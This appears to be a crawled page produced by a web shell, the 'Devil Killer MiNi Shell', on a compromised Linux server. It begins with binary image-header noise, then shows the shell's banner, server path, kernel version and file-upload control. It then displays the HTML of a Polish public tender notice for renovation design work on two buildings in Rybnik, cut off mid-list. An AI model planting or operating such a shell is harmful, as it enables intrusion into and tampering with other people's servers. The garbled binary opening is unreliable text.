JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221229/0052162501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wyk dokumentacji projektowo-kosztorysowej zmiany sposobu ogrzewania, remontu oraz przebudowy budynków mieszkalnych z podziałem na zadania: 1: ul. Mikołowska 130 w Rybniku 2: Mikołowska 134 w Rybniku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD GOSPODARKI MIESZKANIOWEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271505550</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rybnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 42 94 865</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@zgm.rybnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zgm.rybnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wyk dokumentacji projektowo-kosztorysowej zmiany sposobu ogrzewania, remontu oraz przebudowy budynków mieszkalnych z podziałem na zadania: 1: ul. Mikołowska 130 w Rybniku 2: Mikołowska 134 w Rybniku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-924057fd-8696-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00521625</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00339215/35/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.50 Wykonanie dok. projektowo-kosztorys. zmiany sposobu ogrzewania, remontu oraz przebudowy bud mieszkal. przy ul. Mikołowskiej 130 w Rybniku w zakresie dostosowania go do obowiązujących warunków tech.</p> <p class="mb-0">1.3.51 Wykonanie dok. projektowo-kosztorysowej zmiany sposobu ogrzewania, remontu oraz przebudowy bud. mieszk. przy ul.Mikołowskiej 134 w Rybniku w zakresie dostosowania go do obowiązujących warunków tech</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.zgm.rybnik.pl/przetargi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl, ePUAPu<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej dzp@zgm.rybnik.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej dzp@zgm.rybnik.pl<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany i wycofania oferty lub wniosku” oraz „Formularz do komunikacji”.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów<br/>i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z systemu miniPortalu oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” oraz „Formularz do komunikacji” wynosi 150 MB.<br/>6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. W przypadku przekazywania tych dokumentów (innych niż oferta oraz załączniki do oferty) oraz informacji za pomocą poczty elektronicznej – datą ich przesłania będzie<br/>potwierdzenie dostarczenia wiadomości zawierającej dokument/informację z serwera pocztowego Zamawiającego.<br/>7. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z<br/>zakładki Postępowania na miniPortalu.<br/>8. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie<br/>dokumentów elektronicznych (innych niż oferta oraz załączniki do oferty), cyfrowych odwzorowań dokumentów oraz przekazywanie<br/>informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: dzp@zgm.rybnik.pl<br/>9. Dokumenty elektroniczne (inne niż oferta oraz załączniki do oferty) oraz cyfrowe odwzorowania dokumentów składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania ww. dokumentów elektronicznych oraz cyfrowych odwzorowań dokumentów za pomocą poczty elektronicznej, na adres email: dzp@zgm.rybnik.pl<br/>10. Sposób sporządzenia dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r., poz. 2452).<br/>11. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w rozdziale I SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w rozdziale I SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.2120.0068.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 93163,85 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 72838,65 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1: ul. Mikołowska 130<br/>Wymagany zakres opracowania dla każdego budynku:<br/>1)	inwentaryzacja budynku w tym inwentaryzacja pieców węglowych, inwentaryzacja instalacji elektrycznych i teletechnicznych na klatkach schodowych z wyznaczeniem nieczynnych do likwidacji oraz uporządkowanie przebiegu instalacji czynnych wraz z rozeznaniem stanu technicznego elementów budynku dla potrzeb realizacji zamówienia i uwzględnieniu tych robót w projektach oraz kosztorysach wraz z inwentaryzacją kominiarską,<br/>2)	komplet map do projektowania,<br/>3)	ocena techniczna elementów konstrukcyjnych budynku wraz z określeniem ewentualnych robót naprawczych, wzmacniających lub nowych do wykonania i uwzględnieniem ich w dokumentacji projektowo – kosztorysowej,<br/>4)	projektowana charakterystyka energetyczna budynku,<br/>5)	audyt energetyczny wraz z przedstawieniem danych wyjściowych przyjętych do obliczeń w przeprowadzonych audytach energetycznych,<br/>6)	projekt zagospodarowania terenu (zgodnie z ustawą Prawo Budowlane),<br/>7)	projekty budowlano- architektoniczne oraz techniczne dla:<br/>a)	remontu oraz przebudowy budynku w zakresie dostosowania budynku do obowiązujących warunków Technicznych WT 2021 z uwzględnieniem projektowania uniwersalnego w celu zapewnienia dostępności osobom ze szczególnymi potrzebami,<br/>b)	termomodernizacji budynku na podstawie Warunków Technicznych (WT 2021) wraz z hydroizolacją ścian fundamentowych do głębokości posadowienia oraz likwidacją pieców węglowych. W przypadku braku zgody Wojewódzkiego Konserwatora Zabytków dotyczącej możliwości ocieplenia budynku od zewnątrz- należy zaprojektować ocieplenie od wewnątrz mieszkań,<br/>Wariant 1: w przypadku możliwości podłączenia budynku do sieci ciepłowniczej:<br/>	projekt pomieszczenia węzła cieplnego zgodnie z otrzymanymi warunkami technicznymi od PGNiG TERMIKA Przemysłowa S.A.,<br/>	projekt instalacji centralnego ogrzewania, wodno-kanalizacyjnej, ciepłej wody użytkowej wraz z doborem urządzeń,<br/>	projekt instalacji elektrycznej w zakresie zasilania urządzeń wodno-kanalizacyjnej, ciepłej wody użytkowej oraz centralnego ogrzewania.<br/>Wariant 2: etażowe ogrzewanie gazowe dla każdego lokalu w zakresie	zapewnienia centralnego ogrzewania oraz ciepłej wody użytkowej:<br/>	projekt instalacji gazu zgodnie z otrzymanymi warunkami Polskiej Spółki Gazownictwa,<br/>	projekt instalacji centralnego ogrzewania, wodno-kanalizacyjnej, ciepłej wody użytkowej wraz z doborem urządzeń,<br/>	projekt instalacji elektrycznej w zakresie zasilania urządzeń centralnego ogrzewania i ciepłej wody użytkowej.<br/>c)	projekt instalacji gazu lub instalacji elektrycznej wraz z doborem urządzeń dla potrzeb przygotowania ciepłych posiłków dla każdego mieszkania (kuchnia gazowa lub elektryczna),<br/>d)	projekt przebudowy oraz remontu klatki schodowej z uwzględnieniem modernizacji istniejącej instalacji elektrycznej oraz niskoprądowej,<br/>8)	projekty wykonawcze z podziałem na branże,<br/>9)	przygotowanie koncepcji przebudowy oraz remontu budynku w zakresie układu funkcjonalnego oraz rozwiązań technicznych, dostarczenie koncepcji do 21 dni od zawarcia umowy,<br/>10) w przypadku braku możliwości przyłączenia obiektu do sieci ciepłowniczej: oświadczenie projektanta w tym zakresie,<br/>11) w przypadku braku przyłączenia budynków zarówno do sieci ciepłowniczej, jak i sieci gazowej projektant powinien przedstawić rozwiązanie alternatywne i uzyskać akceptację Zamawiającego oraz wykonać dokumentację w tym zakresie,<br/>12) wykonanie projektów zgodnie z warunkami technicznymi WT 2021, ustawą Prawo Budowlane oraz zgodnie ze standardami dostępności dla polityki spójności 2021-2027,<br/>13) niezbędne uzgodnienia i opinie (w tym między innymi opinia Konserwatora Zabytków, opinia kominiarska, warunki przyłączeniowe z poszczególnymi gestorami sieci, ocena stanu technicznego),<br/>14) obliczenie zapotrzebowania na paliwo gazowe i wystąpienie o warunki techniczne przyłączenia do sieci gazowej lub wystąpienie do PGNiG Energetyka Przemysłowa S.A. o warunki przyłączenia do sieci ciepłowniczej,<br/>15) specyfikacje techniczne wykonania i odbioru robót, <br/>16) kosztorysy inwestorskie (wykonanie aktualizacji kosztorysów inwestorskich w okresie 3 lat od daty protokolarnego przekazania dokumentacji),<br/>17) przedmiary robót wraz z zestawieniem materiałów z podziałem na poszczególne branże,<br/>18) zbiorcze zestawienie kosztów,<br/>19) uzyskanie pozwolenia na budowę bądź zgłoszenia zamiaru wykonania robót budowlanych,<br/>20) harmonogram wykonania robót budowlanych,<br/>21) w dokumentacji należy uwzględnić między innymi:<br/>a)	wymianę lub remont zadaszeń wejść do budynków, <br/>b)	wykonanie przebudowy i remontu klatki schodowej obejmującej między innymi wymianę instalacji elektrycznej, niskoprądowych oraz malowanie,<br/>c)	wykonanie hydroizolacji ścian fundamentowych do głębokości ich posadowienia. W przypadku konieczności: zaprojektowanie drenażu opaskowego oraz izolacji poziomej ścian piwnicznych,<br/>d)	zapewnienie urządzenia do przygotowania posiłków wraz z podłączeniem instalacji (w przypadku gdy piec węglowy lub kuchenka gazowa na gaz propan-butan były jedynymi urządzeniami do przygotowania posiłków),<br/>e)	zapewnienie możliwości przygotowania ciepłej wody użytkowej w każdym mieszkaniu,<br/>f)	zaprojektowanie instalacji centralnego ogrzewania w technologii rur stalowych łączonych systemem zaciskowym,<br/>g)	przełożenie anten satelitarnych na jeden maszt,<br/>h)	zapewnienie prawidłowej wentylacji w mieszkaniach, <br/>i)	dostosowanie mieszkań do aktualnych warunków technicznych w tym pustostanów,<br/>j)	w przypadku kotła gazowego: włączenia istniejącej sprawnej instalacji ciepłej wody użytkowej do projektowanego kotła gazowego lub w przypadku braku przyłączenie do projektowanej instalacji ciepłej wody użytkowej,<br/>k)	wymianę stolarki okiennej i drzwi wejściowych z dostosowaniem do aktualnych wymagań warunków technicznych,<br/>l)	zalecenie z przeglądów budynków.<br/><br/>Dodatkowo dla zadania nr 1 w dokumentacji należy uwzględnić:<br/>a)	remont tarasu (Zamawiający posiada dokumentację dla zagospodarowania terenu wokół budynku, którą należy uwzględnić przy projektowaniu remontu tarasu - załącznik do SWZ),<br/>b)	przy przebudowie budynku pozostawienie domu dziecka w budynku.<br/>Szczegółowy zakres usługi określa Specyfikacja Warunków Zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 32407,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny oferty został określony w SWZ w rozdziale XXII: &#34;Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert&#34;.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2: ul. Mikołowska 134<br/>Wymagany zakres opracowania dla każdego budynku:<br/>1)	inwentaryzacja budynku w tym inwentaryzacja pieców węglowych, inwentaryzacja instalacji elektrycznych i teletechnicznych na klatkach schodowych z wyznaczeniem nieczynnych do likwidacji oraz uporządkowanie przebiegu instalacji czynnych wraz z rozeznaniem stanu technicznego elementów budynku dla potrzeb realizacji zamówienia i uwzględnieniu tych robót w projektach oraz kosztorysach wraz z inwentaryzacją kominiarską,<br/>2)	komplet map do projektowania,<br/>3)	ocena techniczna elementów konstrukcyjnych budynku wraz z określeniem ewentualnych robót naprawczych, wzmacniających lub nowych do wykonania i uwzględnieniem ich w dokumentacji projektowo – kosztorysowej,<br/>4)	projektowana charakterystyka energetyczna budynku,<br/>5)	audyt energetyczny wraz z przedstawieniem danych wyjściowych przyjętych do obliczeń w przeprowadzonych audytach energetycznych,<br/>6)	projekt zagospodarowania terenu (zgodnie z ustawą Prawo Budowlane),<br/>7)	projekty budowlano- architektoniczne oraz techniczne dla:<br/>a)	remontu oraz przebudowy budynku w zakresie dostosowania budynku do obowiązujących warunków Technicznych WT 2021 z uwzględnieniem projektowania uniwersalnego w celu zapewnienia dostępności osobom ze szczególnymi potrzebami,<br/>b)	termomodernizacji budynku na podstawie Warunków Technicznych (WT 2021) wraz z hydroizolacją ścian fundamentowych do głębokości posadowienia oraz likwidacją pieców węglowych. W przypadku braku zgody Wojewódzkiego Konserwatora Zabytków dotyczącej możliwości ocieplenia budynku od zewnątrz- należy zaprojektować ocieplenie od wewnątrz mieszkań,<br/>Wariant 1: w przypadku możliwości podłączenia budynku do sieci ciepłowniczej:<br/>	projekt pomieszczenia węzła cieplnego zgodnie z otrzymanymi warunkami technicznymi od PGNiG TERMIKA Przemysłowa S.A.,<br/>	projekt instalacji centralnego ogrzewania, wodno-kanalizacyjnej, ciepłej wody użytkowej wraz z doborem urządzeń,<br/>	projekt instalacji elektrycznej w zakresie zasilania urządzeń wodno-kanalizacyjnej, ciepłej wody użytkowej oraz centralnego ogrzewania.<br/>Wariant 2: etażowe ogrzewanie gazowe dla każdego lokalu w zakresie	zapewnienia centralnego ogrzewania oraz ciepłej wody użytkowej:<br/>	projekt instalacji gazu zgodnie z otrzymanymi warunkami Polskiej Spółki Gazownictwa,<br/>	projekt instalacji centralnego ogrzewania, wodno-kanalizacyjnej, ciepłej wody użytkowej wraz z doborem urządzeń,<br/>	projekt instalacji elektrycznej w zakresie zasilania urządzeń centralnego ogrzewania i ciepłej wody użytkowej.<br/>c)	projekt instalacji gazu lub instalacji elektrycznej wraz z doborem urządzeń dla potrzeb przygotowania ciepłych posiłków dla każdego mieszkania (kuchnia gazowa lub elektryczna),<br/>d)	projekt przebudowy oraz remontu klatki schodowej z uwzględnieniem modernizacji istniejącej instalacji elektrycznej oraz niskoprądowej,<br/>8)	projekty wykonawcze z podziałem na branże,<br/>9)	przygotowanie koncepcji przebudowy oraz remontu budynku w zakresie układu funkcjonalnego oraz rozwiązań technicznych, dostarczenie koncepcji do 21 dni od zawarcia umowy,<br/>10) w przypadku braku możliwości przyłączenia obiektu do sieci ciepłowniczej: oświadczenie projektanta w tym zakresie,<br/>11) w przypadku braku przyłączenia budynków zarówno do sieci ciepłowniczej, jak i sieci gazowej projektant powinien przedstawić rozwiązanie alternatywne i uzyskać akceptację Zamawiającego oraz wykonać dokumentację w tym zakresie,<br/>12) wykonanie projektów zgodnie z warunkami technicznymi WT 2021, ustawą Prawo Budowlane oraz zgodnie ze standardami dostępności dla polityki spójności 2021-2027,<br/>13) niezbędne uzgodnienia i opinie (w tym między innymi opinia Konserwatora Zabytków, opinia kominiarska, warunki przyłączeniowe z poszczególnymi gestorami sieci, ocena stanu technicznego),<br/>14) obliczenie 